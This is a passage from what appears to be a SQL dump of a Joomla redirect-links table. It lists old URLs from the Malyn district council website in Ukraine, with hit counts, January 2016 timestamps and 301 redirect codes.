00:00:00',301),(24793,'http://www.malyn-rayrada.org.ua/index.php/295-na-malinshhini-svjato-ostannogo-dzvonika_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:21:22','0000-00-00 00:00:00',301),(24794,'http://www.malyn-rayrada.org.ua/index.php/613-upravlinnja-statistiki-informue_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-10 22:21:30','0000-00-00 00:00:00',301),(24795,'http://www.malyn-rayrada.org.ua/index.php/614-osvoennja-novoi-profesii-abo-pidvishhennja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-10 22:21:32','0000-00-00 00:00:00',301),(24796,'http://www.malyn-rayrada.org.ua/index.php/616-narodnij-deputat-ukraini-zhuravskij-trimae-slovo?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-10 22:21:35','0000-00-00 00:00:00',301),(24797,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--03022014-/700-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi_3?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-01-10 22:21:41','0000-00-00 00:00:00',301),(24798,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--14112012-/371-pro-priznachennja-kerivnika-komunalnogo_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:21:47','0000-00-00 00:00:00',301),(24799,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/206-pro-hid-vikonannja-kompleksnoi-dovgostrokovoi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:21:55','0000-00-00 00:00:00',301),(24800,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--19122011-/207-pro-zvit-golovi-postijnoi-komisii-rajonnoi-radi-z?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 22:21:57','0000-00-00 00:00:00',301),(24801,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--20062014-/834-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_3?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:22:07','0000-00-00 00:00:00',301),(24802,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21102011-/94-pro-hid-vikonannja-programi-pidtrimki-malogo?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-01-10 22:22:19','0000-00-00 00:00:00',301),(24803,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/369-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:22:21','0000-00-00 00:00:00',301),(24804,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/634-pro-pogodzhennja-peredachi-v-orendu-primishhen-pid?tmpl=component&print=1&layout=default&page=','','','',5,0,'2016-01-10 22:22:33','0000-00-00 00:00:00',301),(24805,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/635-pro-nadannja-dozvolu-na-vlashtuvannja-rozgon-v-f?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-10 22:22:35','0000-00-00 00:00:00',301),(24806,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/660-pro-situaciju-iz-obslugovuvannjam-miscevih?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-01-10 22:22:47','0000-00-00 00:00:00',301),(24807,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--29112013-/668-pro-zatverdzhennja-rozporjadzhennja-golovi_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:22:50','0000-00-00 00:00:00',301),(24808,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--30042014-/785-pro-vnesennja-zmin-do-rajonnogo-bjudzhetu-na-2014_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:22:54','0000-00-00 00:00:00',301),(24809,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-21022013-/495-pro-docilnist-perebuvannja-na-posadi-nachalnika?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-10 22:23:06','0000-00-00 00:00:00',301),(24810,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/73-pro-obrannja-golovi-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-01-10 22:23:39','0000-00-00 00:00:00',301),(24811,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/962-pro-vstanovlennya-orendnoji-plati?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:23:58','0000-00-00 00:00:00',301),(24812,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/968-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2014-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:24:00','0000-00-00 00:00:00',301),(24813,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/981-pro-zatverdzhennya-programi-rozvitku-malogo-i-serednogo-pidpriemnitstva-malinskogo-rajonu-na-2015-2016-roki?tmpl=component&print=1&layout=default&page=','','','',7,0,'2016-01-10 22:24:03','0000-00-00 00:00:00',301),(24814,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-19-12-2014-roku/982-pro-programu-zabezpechennya-deputatskoji-diyalnosti-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-10 22:24:05','0000-00-00 00:00:00',301),(24815,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-26-11-2014-roku/76-rishennya-vid-29-07-2015-roku/1171-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-10 22:44:11','0000-00-00 00:00:00',301),(24817,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=450:-l-2011-2013-r&catid=38:--19122011-&Itemid=73&lang=ru','','','',2,0,'2016-01-10 23:47:19','0000-00-00 00:00:00',301),(24818,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-49-27/pochesni-gromadyani-rajonu-5-5','','','',2,0,'2016-01-11 03:28:55','0000-00-00 00:00:00',301),(24819,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/kvitu-2-141','','','',2,0,'2016-01-11 03:29:12','0000-00-00 00:00:00',301),(24820,'http://www.malyn-rayrada.org.ua/index.php/580-upravlinnja-statistiki-v-m-malin-informue_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 03:29:31','0000-00-00 00:00:00',301),(24821,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/proekti-rishen/1001-pro-programu-sotsialno-ekonomichnogo-rozvitku-malinskogo-rajonu-na-2015-rik?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-11 04:05:10','0000-00-00 00:00:00',301),(24822,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=190:2010-12-15-13-24-17&catid=29:--15122010-&Itemid=60&lang=en','','','',4,0,'2016-01-11 04:06:31','0000-00-00 00:00:00',301),(24823,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=190:2010-12-15-13-24-17&catid=29:--15122010-&Itemid=60&lang=ru','','','',4,0,'2016-01-11 04:06:38','0000-00-00 00:00:00',301),(24824,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=193:------------2009-2010-&catid=29:--15122010-&Itemid=60&lang=en','','','',10,0,'2016-01-11 04:06:46','0000-00-00 00:00:00',301),(24825,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=en&Itemid=','','','',4,0,'2016-01-11 04:07:06','0000-00-00 00:00:00',301),(24826,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=en&Itemid=0','','','',4,0,'2016-01-11 04:07:14','0000-00-00 00:00:00',301),(24827,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=ru&Itemid=','','','',4,0,'2016-01-11 04:07:19','0000-00-00 00:00:00',301),(24828,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=ru&Itemid=0','','','',4,0,'2016-01-11 04:07:27','0000-00-00 00:00:00',301),(24829,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=619:-11-6-&catid=11&lang=uk&Itemid=0','','','',4,0,'2016-01-11 04:07:41','0000-00-00 00:00:00',301),(24830,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=620:2012-03-29-10-03-40&catid=11&lang=en&Itemid=0','','','',4,0,'2016-01-11 04:07:50','0000-00-00 00:00:00',301),(24831,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=620:2012-03-29-10-03-40&catid=11&lang=ru&Itemid=0','','','',4,0,'2016-01-11 04:08:01','0000-00-00 00:00:00',301),(24832,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=620:2012-03-29-10-03-40&catid=11&lang=uk&Itemid=0','','','',4,0,'2016-01-11 04:08:16','0000-00-00 00:00:00',301),(24833,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=632:-2011-2015-&catid=42&Itemid=80&lang=en','','','',4,0,'2016-01-11 04:08:31','0000-00-00 00:00:00',301),(24834,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11&lang=en&Itemid=','','','',4,0,'2016-01-11 04:08:55','0000-00-00 00:00:00',301),(24835,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11&lang=en&Itemid=0','','','',4,0,'2016-01-11 04:09:11','0000-00-00 00:00:00',301),(24836,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11&lang=ru&Itemid=','','','',4,0,'2016-01-11 04:09:18','0000-00-00 00:00:00',301),(24837,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=659:-2011-&catid=11&lang=ru&Itemid=0','','','',4,0,'2016-01-11 04:09:34','0000-00-00 00:00:00',301),(24838,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=ru&Itemid=','','','',3,0,'2016-01-11 04:09:54','0000-00-00 00:00:00',301),(24839,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=ru&Itemid=0','','','',3,0,'2016-01-11 04:10:04','0000-00-00 00:00:00',301),(24840,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=uk&Itemid=','','','',3,0,'2016-01-11 04:10:15','0000-00-00 00:00:00',301),(24841,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=832:-9-2012-&catid=11&lang=uk&Itemid=0','','','',3,0,'2016-01-11 04:10:27','0000-00-00 00:00:00',301),(24842,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=en&Itemid=','','','',3,0,'2016-01-11 04:10:43','0000-00-00 00:00:00',301),(24843,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=ru&Itemid=','','','',3,0,'2016-01-11 04:10:48','0000-00-00 00:00:00',301),(24844,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=833:2012-11-30-06-51-18&catid=11&lang=uk&Itemid=','','','',3,0,'2016-01-11 04:10:57','0000-00-00 00:00:00',301),(24845,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&lang=en&Itemid=','','','',3,0,'2016-01-11 04:11:06','0000-00-00 00:00:00',301),(24846,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=834:-20-&catid=11&lang=ru&Itemid=','','','',3,0,'2016-01-11 04:11:16','0000-00-00 00:00:00',301),(24847,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=860:09&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',3,0,'2016-01-11 04:13:20','0000-00-00 00:00:00',301),(24848,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:------qq&catid=15&lang=ru&Itemid=','','','',4,0,'2016-01-11 04:13:39','0000-00-00 00:00:00',301),(24849,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:------qq&catid=15&lang=uk&Itemid=','','','',4,0,'2016-01-11 04:13:58','0000-00-00 00:00:00',301),(24850,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:------qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',4,0,'2016-01-11 04:14:11','0000-00-00 00:00:00',301),(24851,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=861:------qq&catid=15:2010-06-06-09-34-01&Itemid=18&lang=ru','','','',3,0,'2016-01-11 04:14:20','0000-00-00 00:00:00',301),(24852,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:------qq&catid=15&lang=en&Itemid=','','','',3,0,'2016-01-11 04:14:46','0000-00-00 00:00:00',301),(24853,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:------qq&catid=15&lang=en&Itemid=0','','','',3,0,'2016-01-11 04:14:53','0000-00-00 00:00:00',301),(24854,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:------qq&catid=15&lang=ru&Itemid=','','','',3,0,'2016-01-11 04:15:00','0000-00-00 00:00:00',301),(24855,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:------qq&catid=15&lang=ru&Itemid=0','','','',3,0,'2016-01-11 04:15:14','0000-00-00 00:00:00',301),(24856,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=863:------qq&catid=15&lang=uk&Itemid=0','','','',3,0,'2016-01-11 04:15:34','0000-00-00 00:00:00',301),(24857,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:------qq&catid=15&lang=en&Itemid=','','','',3,0,'2016-01-11 04:15:40','0000-00-00 00:00:00',301),(24858,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:------qq&catid=15&lang=en&Itemid=0','','','',3,0,'2016-01-11 04:15:45','0000-00-00 00:00:00',301),(24859,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=864:------qq&catid=15&lang=uk&Itemid=0','','','',3,0,'2016-01-11 04:16:26','0000-00-00 00:00:00',301),(24860,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=en&Itemid=','','','',3,0,'2016-01-11 04:16:33','0000-00-00 00:00:00',301),(24861,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=en&Itemid=0','','','',4,0,'2016-01-11 04:16:42','0000-00-00 00:00:00',301),(24862,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=ru&Itemid=0','','','',4,0,'2016-01-11 04:17:01','0000-00-00 00:00:00',301),(24863,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=uk&Itemid=','','','',3,0,'2016-01-11 04:17:10','0000-00-00 00:00:00',301),(24864,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=866:2012-12-14-06-58-01&catid=11&lang=uk&Itemid=0','','','',3,0,'2016-01-11 04:17:21','0000-00-00 00:00:00',301),(24865,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=en&Itemid=','','','',3,0,'2016-01-11 04:17:29','0000-00-00 00:00:00',301),(24866,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=en&Itemid=0','','','',3,0,'2016-01-11 04:17:33','0000-00-00 00:00:00',301),(24867,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=ru&Itemid=0','','','',3,0,'2016-01-11 04:17:54','0000-00-00 00:00:00',301),(24868,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=uk&Itemid=','','','',3,0,'2016-01-11 04:18:06','0000-00-00 00:00:00',301),(24869,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=869:2012-12-16-16-05-45&catid=11&lang=uk&Itemid=0','','','',3,0,'2016-01-11 04:18:11','0000-00-00 00:00:00',301),(24870,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=en&Itemid=','','','',3,0,'2016-01-11 04:18:21','0000-00-00 00:00:00',301),(24871,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=en&Itemid=0','','','',3,0,'2016-01-11 04:18:33','0000-00-00 00:00:00',301),(24872,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=ru&Itemid=','','','',3,0,'2016-01-11 04:18:44','0000-00-00 00:00:00',301),(24873,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=ru&Itemid=0','','','',4,0,'2016-01-11 04:18:53','0000-00-00 00:00:00',301),(24874,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=uk&Itemid=','','','',4,0,'2016-01-11 04:19:03','0000-00-00 00:00:00',301),(24875,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=870:2012-12-17-07-02-51&catid=11&lang=uk&Itemid=0','','','',4,0,'2016-01-11 04:19:13','0000-00-00 00:00:00',301),(24876,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=en&Itemid=0','','','',4,0,'2016-01-11 04:19:27','0000-00-00 00:00:00',301),(24877,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=ru&Itemid=','','','',4,0,'2016-01-11 04:19:34','0000-00-00 00:00:00',301),(24878,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=ru&Itemid=0','','','',4,0,'2016-01-11 04:19:46','0000-00-00 00:00:00',301),(24879,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=872:2012-12-17-18-45-20&catid=11&lang=uk&Itemid=0','','','',4,0,'2016-01-11 04:20:05','0000-00-00 00:00:00',301),(24880,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=ru&Itemid=','','','',3,0,'2016-01-11 04:20:51','0000-00-00 00:00:00',301),(24881,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=ru&Itemid=0','','','',3,0,'2016-01-11 04:21:01','0000-00-00 00:00:00',301),(24882,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=uk&Itemid=0','','','',3,0,'2016-01-11 04:21:09','0000-00-00 00:00:00',301),(24883,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=447:2011-10-27-08-08-16&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',1,0,'2016-01-11 05:38:59','0000-00-00 00:00:00',301),(24884,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/263-pro-zatverdzhennja-dogovoru-pro-nadannja-subvencii','','','',3,0,'2016-01-11 06:39:45','0000-00-00 00:00:00',301),(24885,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/267-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_10','','','',3,0,'2016-01-11 06:39:48','0000-00-00 00:00:00',301),(24886,'http://malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/268-pro-zatverdzhennja-zvitu-pro-vikonannja-rajonnogo_3','','','',3,0,'2016-01-11 06:39:51','0000-00-00 00:00:00',301),(24887,'http://www.malyn-rayrada.org.ua/index.php/646-shhe-odin-krok-do-zavershennja-vporjadkuvannja?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-11 06:41:22','0000-00-00 00:00:00',301),(24888,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--15062011-/194-pro-nadannja-pilgi-z-orendnoi-plati-viddilu?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-11 06:41:53','0000-00-00 00:00:00',301),(24889,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--21122012/436-pro-peredachu-materialnih-cinnostej-z-balansu?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-11 06:42:11','0000-00-00 00:00:00',301),(24890,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/596-pro-vnesennja-zmin-do-kompleksnoi-dovgostrokovoi_2?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-11 06:42:17','0000-00-00 00:00:00',301),(24891,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/--25102013-/599-pro-zatverdzhennja-tehnichnoi-dokumentacii-z_11?tmpl=component&print=1&layout=default&page=','','','',6,0,'2016-01-11 06:42:18','0000-00-00 00:00:00',301),(24892,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/159-pro-hid-vikonannja-rajonnoi-programi-rozvitku_4?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 06:42:52','0000-00-00 00:00:00',301),(24893,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/173-pro-hid-vikonannja-rajonnoi-programi-prizovna?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-11 06:42:56','0000-00-00 00:00:00',301),(24894,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/174-pro-edinij-den-deputata?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-11 06:42:57','0000-00-00 00:00:00',301),(24895,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/175-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_5?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-11 06:42:59','0000-00-00 00:00:00',301),(24896,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/176-pro-zatverdzhennja-spilnih-rozporjadzhen-golovi_5?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-11 06:43:02','0000-00-00 00:00:00',301),(24897,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/177-pro-zatverdzhennja-rozporjadzhen-golovi-rajonnoi_6?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-11 06:43:04','0000-00-00 00:00:00',301),(24898,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/178-pro-spisannja-osnovnih-zasobiv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-11 06:43:06','0000-00-00 00:00:00',301),(24899,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/179-pro-nadannja-zgodi-na-peredachu-traktora?tmpl=component&print=1&layout=default&page=','','','',1,0,'2016-01-11 06:43:09','0000-00-00 00:00:00',301),(24900,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-20052011/180-pro-zvernennja-deputativ-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-11 06:43:11','0000-00-00 00:00:00',301),(24901,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22022012-/8-pro-zatverdzhennja-metodiki-rozrahunku-orendnoi?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-11 06:43:35','0000-00-00 00:00:00',301),(24902,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/65-pro-vstanovlennja-nadbavki?tmpl=component&print=1&layout=default&page=','','','',4,0,'2016-01-11 06:43:42','0000-00-00 00:00:00',301),(24903,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/-22102010-/74-pro-prisvoennja-golovi-rajonnoi-radi-rangu?tmpl=component&print=1&layout=default&page=','','','',8,0,'2016-01-11 06:43:47','0000-00-00 00:00:00',301),(24904,'http://www.malyn-rayrada.org.ua/index.php/rishennja-radi/rishennja/rishennya-vid-17-09-2014/868-pro-peredachu-nerukhomogo-majna?tmpl=component&print=1&layout=default&page=','','','',2,0,'2016-01-11 06:43:53','0000-00-00 00:00:00',301),(24905,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-22-17-50-18/malinshchina-i-malinchani-83','','','',3,0,'2016-01-11 07:54:56','0000-00-00 00:00:00',301),(24906,'http://www.malyn-rayrada.org.ua/index.php/2010-06-05-12-55-45/2010-06-06-05-22-15/kvituche-selo/2014-09-23-06-08-04/img-0920-11-105','','','',3,0,'2016-01-11 07:54:57','0000-00-00 00:00:00',301),(24907,'http://malyn-rayrada.org.ua/index.php/184-vitaemo-viktora-kostereva-z-nagorodoju','','','',3,0,'2016-01-11 09:20:05','0000-00-00 00:00:00',301),(24908,'http://malyn-rayrada.org.ua/index.php/184-vitaemo-viktora-kostereva-z-nagorodoju?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:20:10','0000-00-00 00:00:00',301),(24909,'http://malyn-rayrada.org.ua/index.php/211-vidbulas-pozachergova-15-sesija-rajonnoi-radi','','','',3,0,'2016-01-11 09:21:57','0000-00-00 00:00:00',301),(24910,'http://malyn-rayrada.org.ua/index.php/211-vidbulas-pozachergova-15-sesija-rajonnoi-radi?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:22:01','0000-00-00 00:00:00',301),(24911,'http://malyn-rayrada.org.ua/index.php/250-z-peremogoju?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:22:07','0000-00-00 00:00:00',301),(24912,'http://malyn-rayrada.org.ua/index.php/252-vitaemo-iz-svjatom-pershogo-dzvonika?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:22:13','0000-00-00 00:00:00',301),(24913,'http://malyn-rayrada.org.ua/index.php/281-vidbulas-11-sesija-rajonnoi-radi-6-sklikannja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:22:31','0000-00-00 00:00:00',301),(24914,'http://malyn-rayrada.org.ua/index.php/295-na-malinshhini-svjato-ostannogo-dzvonika_2','','','',3,0,'2016-01-11 09:22:34','0000-00-00 00:00:00',301),(24915,'http://malyn-rayrada.org.ua/index.php/295-na-malinshhini-svjato-ostannogo-dzvonika_2?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:22:40','0000-00-00 00:00:00',301),(24916,'http://malyn-rayrada.org.ua/index.php/302-do-vidoma-zhiteliv-rajonu','','','',3,0,'2016-01-11 09:22:44','0000-00-00 00:00:00',301),(24917,'http://malyn-rayrada.org.ua/index.php/302-do-vidoma-zhiteliv-rajonu?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:22:46','0000-00-00 00:00:00',301),(24918,'http://malyn-rayrada.org.ua/index.php/303-novij-direktor-malinskoi-ditjachoi-shkoli-mistectv','','','',3,0,'2016-01-11 09:22:47','0000-00-00 00:00:00',301),(24919,'http://malyn-rayrada.org.ua/index.php/303-novij-direktor-malinskoi-ditjachoi-shkoli-mistectv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:22:50','0000-00-00 00:00:00',301),(24920,'http://malyn-rayrada.org.ua/index.php/31-vistup-ansamblju-kozackoi-pisni-malichi-24-serpnja','','','',3,0,'2016-01-11 09:22:58','0000-00-00 00:00:00',301),(24921,'http://malyn-rayrada.org.ua/index.php/31-vistup-ansamblju-kozackoi-pisni-malichi-24-serpnja?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:03','0000-00-00 00:00:00',301),(24922,'http://malyn-rayrada.org.ua/index.php/310-zakinchilis-poshuki-v-rodini-volovenko-mogili?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:11','0000-00-00 00:00:00',301),(24923,'http://malyn-rayrada.org.ua/index.php/32-zasluzhene-zvannja-direktorovi-malinskoi-djussh','','','',3,0,'2016-01-11 09:23:14','0000-00-00 00:00:00',301),(24924,'http://malyn-rayrada.org.ua/index.php/32-zasluzhene-zvannja-direktorovi-malinskoi-djussh?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:17','0000-00-00 00:00:00',301),(24925,'http://malyn-rayrada.org.ua/index.php/385-rezultati-ekzit-poliv?tmpl=component&print=1&layout=default&page=','','','',3,0,'2016-01-11 09:23:23','0000-00-00 